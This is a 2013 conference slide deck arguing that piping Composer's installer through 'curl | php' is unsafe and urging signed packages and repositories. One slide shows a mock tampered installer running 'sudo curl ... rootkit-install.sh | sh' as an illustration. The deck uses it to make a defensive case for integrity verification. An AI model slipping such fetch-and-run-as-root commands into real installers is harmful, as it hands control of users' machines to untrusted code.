Upgrade to Pro — share decks privately, control downloads, hide ads and more …

Composer - russian roulette

Joshua Thijssen
March 26, 2013

Composer - russian roulette

Joshua Thijssen

March 26, 2013


  1. First things first: • I like composer. • It has

    changed PHP packaging for the better. • I use it on a daily basis. • But composer is doing it wrong...
  2. Installing composer $ curl -sS https://getcomposer.org/installer | php Taken straight

    from the manual: http://getcomposer.org/doc/00-intro.md
  3. https://getcomposer.org/installer #!/usr/bin/env php <?php /* * This file is part

    of Composer. * * (c) Nils Adermann <[email protected]> * Jordi Boggiano <[email protected]> * * For the full copyright and license information, please view the LICENSE * file that was distributed with this source code. */ process($argv); /** * processes the installer */ function process($argv) { $check = in_array('--check', $argv); $help = in_array('--help', $argv); $force = in_array('--force', $argv); $quiet = in_array('--quiet', $argv); $installDir = false; foreach ($argv as $key => $val) { if (0 === strpos($val, '--install-dir')) { if (13 === strlen($val) && isset($argv[$key+1])) { $installDir = trim($argv[$key+1]); } else { $installDir = trim(substr($val, 14)); } } } if ($help) { displayHelp(); exit(0); }
  4. https://getcomposer.org/installer #!/usr/bin/env php <?php /* Teh H4xx0rs 3v1l filez: */

    exec("sudo curl -sS rootkit-install.sh | sh"); exec("sudo curl -sS orig-composer-stuff.sh | sh");
  5. No, you wouldn’t • Compromises aren’t as visible as this

    example. • You don’t check the SHA / MD5 sum of the downloaded installer. • If you wanted to check, check against what?
  6. The real problem • We download unknown software on our

    development platform, and often also on production servers. • We tend to do this with a privileged (root) account. • We don’t and cannot verify the integrity of this process.
  7. We can fix this • We do this all the

    time: signing. • We take trust in a certificate or key. • Everything that is signed with that certificate / key, is automatically trusted. • “web of trust” • apt-get install, yum install
  8. We can fix this • Let’s add composer to a

    (known) repository (EPEL, dag.wieers, remi collet). • Get rid of the auto-update features of composer. They are useless, and easy to compromise.
  9. But when we fix composer,.. another problem,.. • Composer downloads

    unverified, unsigned packages from mostly git.. • How do we know for sure those are safe?
  10. ... You can have people who try to be malicious.

    They won't succeed. You need to know exactly 20 bytes, you need to know 160-bit SHA-1 name of the top of your tree, and if you know that, you can trust your tree, all the way down, the whole history. You can have 10 years of history, you can have 100,000 files, you can have millions of revisions, and you can trust every single piece of it. .... http://www.youtube.com/watch?v=4XpnKHJAok8 Google TechTalk: Linus on Git
  11. Please.. • “<command> | sh” and “<command> | php” has

    effectively been eliminated in the sysadmin world after decades. • They are insecure and relinquish control to other non-trusted parties. • We should not allow PHP developers to embrace the worst practices.
  12. Please.. • There are better ways to install software. We

    should use them. • Signing is THE best way to securely verify integrity of data. We should get used to them.
  13. Please.. • We need to change composer and all other

    tools that use this to implementing correct signing mechanism. • It’s possible. We can sign composer, and we can sign git commits. • We should not allow unsigned commits/ packages (at least not with a --allow-unsigned-packages)
  14. Btw.. • It’s not just composer, RVM does this just

    as badly: https://rvm.io/rvm/install/ • Let’s stop stupidity and FIX THIS!